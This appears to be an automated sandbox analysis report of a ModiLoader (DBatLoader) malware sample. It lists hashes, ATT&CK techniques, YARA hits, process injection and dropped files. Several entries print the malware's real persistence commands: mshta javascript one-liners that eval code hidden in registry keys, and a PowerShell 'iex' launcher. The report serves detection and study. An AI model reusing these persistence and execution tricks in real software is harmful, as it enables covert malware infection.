modiloader | d47b9e301c4f82f2eeaaee8213d59b0799e711590f72c72e997572b90c053245

General

Target

9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
Size

289KB
MD5

9920dbc6dec1d1535b3c7811ce874936
SHA1

d4d9d41a619792c05b7fe280211cbd764b6cdc39
SHA256

d47b9e301c4f82f2eeaaee8213d59b0799e711590f72c72e997572b90c053245
SHA512

124e0db2ccae16a90fe9e6e79c10902f800138f7eefb494639830a577ebaaae6cb69faca473f1429554bd0f1f80dc8f2e25540631681331ef575f1b64f908747
SSDEEP

6144:OEN9ogmg2z29EnAswFcGdRFzeUK0pD7uMEWV+DFSczqPIBnwljiqMqEMHiYhpccg:j2z2fvK0Ms+APIBaoApcatO

Score

10^/10

modiloader evasion persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2792 2608 mshta.exe
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
evasion

File and Directory Discovery
T1083

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2792	2608	mshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	regsvr32.exe

description	ioc	process
File opened (read-only)	C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	regsvr32.exe

ModiLoader Second Stage 60 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2144-8-0x0000000001D20000-0x0000000001DF4000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-10-0x0000000001D20000-0x0000000001DF4000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-6-0x0000000001D20000-0x0000000001DF4000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-9-0x0000000001D20000-0x0000000001DF4000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-7-0x0000000001D20000-0x0000000001DF4000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-5-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-4-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-2-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-11-0x0000000001D20000-0x0000000001DF4000-memory.dmp	modiloader_stage2
behavioral1/memory/2144-12-0x0000000001D20000-0x0000000001DF4000-memory.dmp	modiloader_stage2
behavioral1/memory/2516-21-0x0000000006220000-0x00000000062F4000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-23-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-29-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-32-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-25-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2516-26-0x0000000006220000-0x00000000062F4000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-27-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-28-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-47-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-59-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-46-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-45-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-44-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-64-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-55-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-56-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-66-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-54-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-49-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-48-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-43-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-42-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-41-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-40-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-39-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-38-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-37-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-36-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-35-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-34-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-72-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-82-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-81-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-80-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-79-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-78-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-77-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-76-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-75-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-74-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-73-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-71-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-70-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-69-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-68-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/1368-67-0x00000000001A0000-0x00000000002DE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-33-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-31-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-30-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2
behavioral1/memory/2776-58-0x0000000000190000-0x00000000002CE000-memory.dmp	modiloader_stage2

Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	regsvr32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvr32.exe

Deletes itself 1 IoCs

Processes:

regsvr32.exe

pid process

2776 regsvr32.exe
Drops startup file 1 IoCs

Processes:

regsvr32.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk regsvr32.exe

pid	process
2776	regsvr32.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk	regsvr32.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

regsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:gT52rxhvs=\"zaZ\";P3g0=new%20ActiveXObject(\"WScript.Shell\");VvCy2YEPU2=\"oXwankmAi\";JvYR4=P3g0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\jvvo\\\\xbawnqo\");P0vYXEy=\"oqYMq6Pir\";eval(JvYR4);xUBIeB0=\"iPnLcA4dv\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Vy5PGsyWM=\"oR5flufqCY\";ki0=new%20ActiveXObject(\"WScript.Shell\");c0B2MXEYQU=\"cYOBLN\";Q4QOa=ki0.RegRead(\"HKCU\\\\software\\\\jvvo\\\\xbawnqo\");V2T8BwlIp=\"xRG\";eval(Q4QOa);xTpul2eEl=\"qYPGcWDl\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\529d1c\\1bcd8a.lnk\""	regsvr32.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvr32.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 2036 set thread context of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2516 set thread context of 2776	2516	powershell.exe	regsvr32.exe
PID 2776 set thread context of 1368	2776	regsvr32.exe	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\International	regsvr32.exe

Modifies registry class 7 IoCs

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open\command\ = "mshta \"javascript:lfzErWv6b=\"O30qBd\";Z4L6=new ActiveXObject(\"WScript.Shell\");iQPJ5vsTj=\"54vXG\";VjI53S=Z4L6.RegRead(\"HKCU\\\\software\\\\jvvo\\\\xbawnqo\");FGpqe3X=\"IHICs9ZK1T\";eval(VjI53S);E0OKIfhQ=\"i076D\";\""	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.cbe78f1	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.cbe78f1\ = "ed42e7"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeregsvr32.exe

pid	process
2516	powershell.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe
2776	regsvr32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exeregsvr32.exe

pid process

2516 powershell.exe
2776 regsvr32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2516 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe

pid process

2036 9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe

description	pid	process
Token: SeDebugPrivilege	2516	powershell.exe

pid	process
2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exemshta.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2036 wrote to memory of 2144	2036	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe	9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
PID 2792 wrote to memory of 2516	2792	mshta.exe	powershell.exe
PID 2792 wrote to memory of 2516	2792	mshta.exe	powershell.exe
PID 2792 wrote to memory of 2516	2792	mshta.exe	powershell.exe
PID 2792 wrote to memory of 2516	2792	mshta.exe	powershell.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2516 wrote to memory of 2776	2516	powershell.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe
PID 2776 wrote to memory of 1368	2776	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2036

C:\Users\Admin\AppData\Local\Temp\9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9920dbc6dec1d1535b3c7811ce874936_JaffaCakes118.exe"
2⤵
PID:2144

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:XMmEfJ8QO="Ywmok2GQ";gF73=new%20ActiveXObject("WScript.Shell");B9DGJQM="SHQ";qIb9d=gF73.RegRead("HKLM\\software\\Wow6432Node\\BzRxg2jtUJ\\yCdRHsf");octqrGS9e="nJIp";eval(qIb9d);zLQ36IzL="Vx";
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:oyywhi
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe
3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\SysWOW64\regsvr32.exe"
4⤵
PID:1368

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Virtualization/Sandbox Evasion

3

T1497

Modify Registry

2

T1112

Credential Access

Discovery

Software Discovery

1

T1518

Query Registry

4

T1012

Virtualization/Sandbox Evasion

3

T1497

File and Directory Discovery

1

T1083

System Information Discovery

3

T1082

Peripheral Device Discovery

1

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\529d1c\1bcd8a.lnk
Filesize
881B

MD5
9b8a1e6c1b0bab16ce809446c784c31f

SHA1
c7fca109ec1274651c830b761a6880b2a58d7f52

SHA256
ec58ae1fb9f256cb0bb7b72f9a8b9f759888bb6235887760ab0b4f1fd59eee49

SHA512
009a2a895163c6cb919872dd7cbda33abcc762928a8830e15268298e820c5fc7873fcbec6711ed156b0c05d21e8d67f64cf5e3e77b295e8dd565f32067df60c0

Download Submit
C:\Users\Admin\AppData\Local\529d1c\4bd7f2.bat
Filesize
61B

MD5
7f145f9c460ee7bb55a3e7ad72a65f86

SHA1
39a73f2119c72ae27a166fff9ceb13859f6ac21b

SHA256
16e3704ce7a5f142fe817cd42cf9fd214341caf20a284c439457feb84515ddad

SHA512
1bfbf2931d904ae08d6552267b918e8f7e6cce6d142f0c950c74e2e601dc3cf36428fcddf67ad3cae1acb565edf4871c0c3c165be88c34d3c81b68b8d7c1a75f

Download Submit
C:\Users\Admin\AppData\Local\529d1c\7fd902.cbe78f1
Filesize
31KB

MD5
a41ed5051692545ee05845f2e35f59d1

SHA1
68003f4e4fda557071b482b69d7ca839ba082daa

SHA256
afd38637f2b7585a478000072f61115192a1b2810253ca52c37bd46b0e35978d

SHA512
58b6b5f039dfaf24f851e43dd80ea78976503ea4b6cfe3371b3ebbc59a4989a6a67d8a3d89cbabb63ce1dac0a070704cbbd350b5b4f68389bae376f9ccfcaeb6

Download Submit
C:\Users\Admin\AppData\Roaming\4f4be6\d3bc4d.cbe78f1
Filesize
47KB

MD5
2bb239b8f4974a953035fea7bc019345

SHA1
997f7012893ebd2df456066a4cdd0cc6b2ae1daa

SHA256
5e7113485678c3773d090de92246e44f09fcf4055f72d7781d067177a7e350e4

SHA512
3cfa96458703d897cdc5feaa2e5e50afaed540b51240f83ef04ec7644bffac16dec9c847141048b431a591aec681d670089c716622c8be9ffe7ce5164aee6271

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk
Filesize
991B

MD5
e4af19dee9aff2c2233416b408569ced

SHA1
bfa2797a0f135c66b02f9ecc0b38098c6dfcd2ec

SHA256
c0abb228dcfff96534a9dac7f8a58f9b845c2115df836a93d24539d71c6801a9

SHA512
a7b0f1305a98a7cb053a16e8693e14353f00b42a9cd6bfcc109a13cdd954c8100c50dae3c7867c6c300c4442df7fbab91b60428dd19770c9a25276188f852be3

Download Submit
memory/1368-74-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-79-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-76-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-72-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-75-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-70-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-78-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-77-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-80-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-81-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-73-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-71-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-82-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-67-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-68-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/1368-69-0x00000000001A0000-0x00000000002DE000-memory.dmp

Filesize
1.2MB

Download
memory/2144-11-0x0000000001D20000-0x0000000001DF4000-memory.dmp

Filesize
848KB

Download
memory/2144-8-0x0000000001D20000-0x0000000001DF4000-memory.dmp

Filesize
848KB

Download
memory/2144-12-0x0000000001D20000-0x0000000001DF4000-memory.dmp

Filesize
848KB

Download
memory/2144-2-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2144-4-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2144-5-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2144-7-0x0000000001D20000-0x0000000001DF4000-memory.dmp

Filesize
848KB

Download
memory/2144-9-0x0000000001D20000-0x0000000001DF4000-memory.dmp

Filesize
848KB

Download
memory/2144-6-0x0000000001D20000-0x0000000001DF4000-memory.dmp

Filesize
848KB

Download
memory/2144-10-0x0000000001D20000-0x0000000001DF4000-memory.dmp

Filesize
848KB

Download
memory/2516-26-0x0000000006220000-0x00000000062F4000-memory.dmp

Filesize
848KB

Download
memory/2516-21-0x0000000006220000-0x00000000062F4000-memory.dmp

Filesize
848KB

Download
memory/2776-27-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-39-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-38-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-37-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-36-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-35-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-34-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-40-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-41-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-42-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-43-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-48-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-49-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-54-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-66-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-56-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-55-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-64-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-44-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-45-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-46-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-59-0x0000000000190000-0x00000000002CE000-memory.dmp

Filesize
1.2MB

Download
memory/2776-47-0x0000000000190000-0x00000000002CE000-memory.dmp

